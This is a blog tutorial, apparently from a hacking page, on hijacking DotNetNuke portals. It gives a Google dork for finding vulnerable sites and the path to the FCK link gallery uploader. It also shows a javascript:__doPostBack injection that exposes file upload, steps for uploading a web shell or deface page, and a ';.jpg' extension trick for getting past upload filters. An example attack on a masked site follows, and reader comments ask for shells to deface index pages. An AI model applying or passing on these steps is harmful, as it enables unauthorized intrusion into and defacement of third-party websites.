Dot Net Nuke Hacking

DNN Portal Hijacking Tutorial

______________________________________________________
Author: Rishabh Saxena
Facebook Page:
Learn to hack (https://www.facebook.com/teamLTH)
______________________________________________________________


Q) What is DNN ?
A) DNN stands for Dot Net Nuke.It is an open source CMS [Content management system] based on .Net platform . It allows management of websites without much technical language which supports large number of third party apps. It requires Internet Information services 6 [IIS 6.0] and ASP.NET and supports SQL server 2003 and 2008 .


Q) What is This hack about?

A) Well there is a security hole in DNN which allows any attacker to upload data to the server. This way you can upload a shell to the server.

So lets start!
______________________________

Steps:


1) Google dork for vulnerable websites : inurl:/tabid/36/language/en-US/Default.aspx

2) After searching the above dork in Google you will come across many sites , open anyone you like .

3)You will see /Home/tabid/36/Language/en-US/Default.aspx in the url .

4)Just replace it with /Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx .

5)Now you will see a page titled **LINK GALLERY** Having some upload options.

6)Now Choose option ""File"" .

7) The inject the following javascript code in the Browser address bar javascript:__doPostBack('ctlURL$cmdUpload','')

Explanation for ctlURL$cmdupload ctlurl is URL control function which opens the cmdupload option which allows attacker to upload a file.
Sometimes the Browser removes *JAVASCRIPT* from this command while copy-pasting , so after pasting the command in browser just check if the **javascript** is still written there if it isnt there write *javascript* before :__doPostBack('ctlURL$cmdUpload','')so the command should always look like :
javascript:__doPostBack('ctlURL$cmdUpload','')

8) Now the ""Choose file"" option will come up .



9) Now choose file and select root click on "upload selected file" , upload any deface html page or any shell and start having fun

10) Now you can view your file/shell at portals/0/uploadedfile.fileformat

11) Additional step : Well sometimes website admin changes the upload permissions and adds filter to the uploader so that u can just upload .jpeg/.jpg/.txt files .
To bypass this filter just rename the shell to
shell.php;.txt
shell.php;.jpg
or any other extension which is allowed
this way when u parse the request for the page/shell in the browser it will read upto .php only it wont read .txt as ";" sign ends the request.

______________________________________________________

Example scenario :
I googled the DORK and it disaplyed list of some sites .
i opened one of the site listed there :
http://www.*****.@@home/tabid/36/language/en-US/default.aspx

then i changed the **home/tabid/36/language/en-US/default.aspx** with **/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx**

So the edited URL was like this :

http://www.*****.@@/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx

Then i clicked on Option ""File"" Then in the address bar i injected this javascript : javascript:__doPostBack('ctlURL$cmdUpload','')

then a "Choose file" option comes up .
I Browsed to my page/shell and click on "Upload selected file" the file was uploaded to : http://www.*****.@@/portals/0/uploadedfile.format
_______________________________________________________

Well i am assuming that readers have knowledge about some terms mentioned above like :
CMS :- http://en.wikipedia.org/wiki/Content_management_system
DNN :- http://en.wikipedia.org/wiki/DotNetNuke
.NET :- http://en.wikipedia.org/wiki/.NET_Framework
SHELL :- http://en.wikipedia.org/wiki/Shell_(computing)

If you don't know ,just read from the links mentioned above.

NOTE: This tutorial is for educational purposes only, Use at your own risk. The Author And The Blog is not responsible for any consequence, be it Good or Bad!!

Original Author: Rishabh Saxena [Member Of Computer Korner]
Facebook Page: Learn to hack (https://www.facebook.com/teamLTH)

Do Not Forget to Visit The LTH Page To Get More Updates!

Thank You!


Feel Free To Leave A Comment

If Our Article has Helped You, Support Us By Making A Small Contribution, Thank You!

3 comments:

  1. I have checked this on many websites but after the link gallery page and adding that javascript.No "choose file" come .Tell me wht's the problem?

    ans at 143ajaygupta@gmail.com

    ReplyDelete
  2. There is no problem, DNN is very old. they are patched now, if no upload option is found, check with other sites.

    ReplyDelete
  3. Can you tell me a good and simple shell.
    I tried r57 but it shows a text, also i tried killer3n but i can't understand it.

    Please tell a shell for purpose of just replacing index.html

    ReplyDelete